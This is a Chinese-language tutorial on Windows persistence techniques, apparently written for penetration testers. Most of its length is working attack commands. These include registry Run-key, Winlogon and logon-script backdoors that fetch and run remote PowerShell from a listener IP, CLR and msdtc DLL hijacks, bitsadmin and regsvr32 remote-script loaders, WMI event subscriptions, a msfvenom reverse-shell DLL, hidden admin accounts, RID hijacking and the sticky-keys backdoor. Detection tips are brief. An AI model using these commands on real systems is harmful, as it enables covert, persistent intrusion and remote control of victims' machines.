windows权限维持(二)
技术篇
对常见的权限维持的技术原理、实现方法、检测技巧进行总结、复现。
注册表类:
普通注册表后门
在一般用户权限下,通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run,键名任意。普通权限即可运行
cmd下操作:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\administrator\desktop\pentestlab.exe"powershell下操作:
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\" "Pentestlab" "C:\Users\administrator\desktop\pentestlab.exe" -Force电脑重启后上线:
除了上面的位置之外还有下面的位置,可以让我们实现权限维持:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce上面的是针对于用户的注册表,下面的这几个是针对本地计算机的注册表:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce添加载荷的方法的自然也和之前的一样了,只是所处的位置不同罢了,注意service的程序。而防御与检测策略也是比较好做的,在这些的注册表的位置查看是否有可疑程序即可。
Winlogon Helper DLL后门
Winlogon是一个Windows组件,用来处理各种活动,如登录、注销、身份验证期间加载用户配置文件、关闭、锁定屏幕等。这种行为由注册表管理,该注册表定义在Windows登录期间启动哪些进程。所以我们可以依靠这个注册表来进行权限维持。
注册表位置如下:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify其中的userinit与shell主要是来运行exe程序,而notify则用来执行dll文件(Windows 7之前)。
而userinit又可以通过powershell的方式,来实现无文件后门,用法如下:
PS C:\Users\Administrator> Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit
-value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c `"IEX ((new-object net.webclient).downloadstr
ing(`'http://192.168.31.109:8080/a`'))`""
注意代码引号的转义问题。可以使用反引号绕过。
Logon Scripts后门
注册表路径: HKCU\Environment\
创建字符串键值: UserInitMprLogonScript
cmd下操作:
reg add "HKCU:\Environment\" /v UserInitMprLogonScript /t REG_SZ /d "C:\1.bat"powershell下操作:
Set-ItemProperty "HKCU:\Environment\" "UserInitMprLogonScript" "C:\1.bat" -Forcebat内容如下:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.31.109:8080/a'))"
Logon Scripts是优先于很多杀毒软件启动(部分杀毒是优先于他启动)的,所以可以通过这种方式将powershell命令写到bat脚本中,达到免杀隐藏启动的效果。
缺点就是需要留文件,并不方便。
注册表之CLR
CLR全称为Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。
要使clr能够劫持系统中全部.net程序,需要设置环境变量,要是只用命令行,可以使用wmi。
直接给出批处理文件:
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
certutil.exe -urlcache -split -f yourdll
certutil.exe -urlcache -split -f yourdll delete
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /Fx64:
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
内部工具类
waitfor.exe
该工具用来同步网络中计算机,可以发送或等待系统上的信号。
支持下列操作系统:
Windows Server 2003
Windows Vista
Windows XP
Windows Server 2008
Windows 7
Windows Server 2003 with SP2
Windows Server 2003 R2
Windows Server 2008 R2
Windows Server 2000
Windows Server 2012
Windows Server 2003 with SP1
Windows 8
Windows 10首先新建一个powershell文件内容为:
start-process calc.exe
cmd /c waitfor persist `&`& powershell -executionpolicy bypass -file c:\test\1.ps1然后开启等待:
waitfor persist1 && powershell -executionpolicy bypass -file c:\test\1.ps1另一个cmd
waitfor /s 127.0.0.1 /si persist1即可成功调用cmd。
注意,低版本powershell会报错:
或者使用三好学生师傅的脚本:
<#
A quick POC to use Waitfor.exe to maintain persistence
Author: 3gstudent @3gstudent
Learn from:https://twitter.com/danielhbohannon/status/872258924078092288
#>
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Backdoor'
$StaticClass.Put()| Out-Null
$StaticClass.Properties.Add('Code' , "cmd /c start calc.exe ```&```& taskkill /f /im powershell.exe ```&```& waitfor persist ```&```& powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==")
$StaticClass.Put() | Out-Null
$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;
iex $exec | Out-Null然后使用下面的方式开启:
powershell -executionpolicy bypass .\test.ps1
waitfor /s 127.0.0.1 /si persist即可看到效果。
bitsadmin
win7之后,进行上传下载的工具。
利用方法如下:
PS C:\Users\Administrator> bitsadmin /create backdoor
PS C:\Users\Administrator> bitsadmin /addfile backdoor c:\windows\system32\calc.exe c:\Users\administrator\Desktop\calc.
exe
PS C:\Users\Administrator> bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:http://192.168.31.109/calc.sc
t scrobj.dll"
PS C:\Users\Administrator> bitsadmin /Resume backdoor
当然,换成msf的sct也就可以上线了。白名单运行程序不仅仅只有regsvr32,还有别的很多,可以去查下资料
可以使用下面的方法进行检测:
PS C:\Users\Administrator> bitsadmin /list /verbose
msdtc加载后门
msdtc.exe 存在于组环境和域环境中,是微软的一个分布式事物处理协调器服务。要求处于工作组或者域环境内。
因为他在启动时会默认加载oci.dll,SQLLib80.dll和xa80.dll。Windows系统默认不包含oci.dll。
我们将后门dll将其重命名为oci.dll,并将其放置在%SystemRoot%\system32\中,那么重启时,就会加载我们的dll,然后得到一个session。
注意,dll版本要根据目标机器的位数来生成。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.109 LPORT=4444 -f dll > oci.dll
cmd或powershell下执行
taskkill /f /im msdtc.exe
net start msdtc即可获得会话。
wmi执行后门技术
WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。
在使用wmi进行权限维持的时候,我们一般用到下面的三个类:
__EventFilter
EventConsumer
__FilterToConsumerBinding 下面我们看下他的利用方式,首先是mof。
msf先生成一个web的监听,然后使用msf生成文件。
irb
puts generate_mof("Metasploit1","regsvr32 /s /n /u /i:http://192.168.31.109:8080/RjdtuMLURHfkH.sct scrobj.dll")
然后编译mof
mofcomp.exe .\Metasploit.mof
即可得到会话。第二种方式就是使用wmi事件。
命令如下:
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="PentestLab", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="PentestLab", ExecutablePath="C:\users\administrator\desktop\msf.exe",CommandLineTemplate="C:\users\administrator\desktop\msf.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"PentestLab\"", Consumer="CommandLineEventConsumer.Name=\"PentestLab\""然后重启电脑,60s后反弹会话。
powershell版本:
$FilterArgs = @{name='Pentestlab-WMI';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='Pentestlab-WMI';
CommandLineTemplate="$($Env:SystemRoot)\System32\pentestlab.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs如果想要删除的话,可以使用下面的命令:
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'Pentestlab-WMI'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'Pentestlab-WMI'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObjectpowershell版本的也可以直接使用别人写好的脚本:https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1
当然以下工具都具有该功能:Empire、SharpSploit、PoshC2、PowerLurk、WMIPersist、
而对于此类攻击的检测,就查看上面所说的那三种类就可以了。
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
且能发现木马的踪迹
计划任务
经典中的经典。
schtasks.exe /Create /TN update /TR xx(你要执行的命令) /SC ONLOGON /F /RL HIGHESTdemo:
C:\Users\Administrator>schtasks /create /sc minute /mo 1 /tn "chrome" /tr "wscri
pt.exe C:\users\Administrator\Desktop\msf.vbs"
或者使用powershell无文件加载也是可以的。
WinRM服务后门
基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。后门连接是需要目标服务器的高权用户的明文密码的,需要先抓取相应的明文密码才可部署后门。
下面是部署方法:
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //开启监听
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} //更改wimrm的端口,防止被怀疑
查看状态:
winrm e winrm/config/listener
然后链接后门,本地做如下设置:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}然后连接后门,获得cmd环境。
C:\Users\Administrator>winrs -r:http://192.168.31.94 -u:administrator -p:abc123! cmd
如果是非管理员用户,用下面的方法修改注册表即可。
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f修改系统服务
使用sc制作权限维持:
#创建Fax传真服务,并设置为自启动
sc create Fax binPath= "C:\123123.exe" start= "auto" obj= "LocalSystem"
#增加服务描述
sc descrīption Fax
#启动
sc start Fax
重启获得会话。
记得监听添加下面的参数防止假死:
set autorunscript migrate -fdll劫持
这个,看个人的思路以及编码能力了,比如劫持个安全狗??
远程登录类
影子账户、克隆账户、激活guest
net user test$ 123456 /add&&net localgroup administrators test$ /add
net user guest /active:yes
net user guest 1234
net localgroup administrators guest /addrid_hijack
通过劫持有效帐户的RID来在注册表中进行修改,以使Guest帐户成为管理员
msf5 post(windows/manage/rid_hijack) > set session 5
session => 5
msf5 post(windows/manage/rid_hijack) > set getsystem true
getsystem => true
msf5 post(windows/manage/rid_hijack) > set guest_account true
guest_account => true
msf5 post(windows/manage/rid_hijack) > set password 123!@ASQs
password => 123!@ASQs
msf5 post(windows/manage/rid_hijack) > exploit
然后impacket链接
shift后门
C:\Windows\System32\sethc.exe 粘滞键,启动快捷键:按五次shift键
C:\Windows\System32\utilman.exe 设置中心,启动快捷键:Windows+U键cd c:\Windows\System32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe高版本的话就映像劫持吧。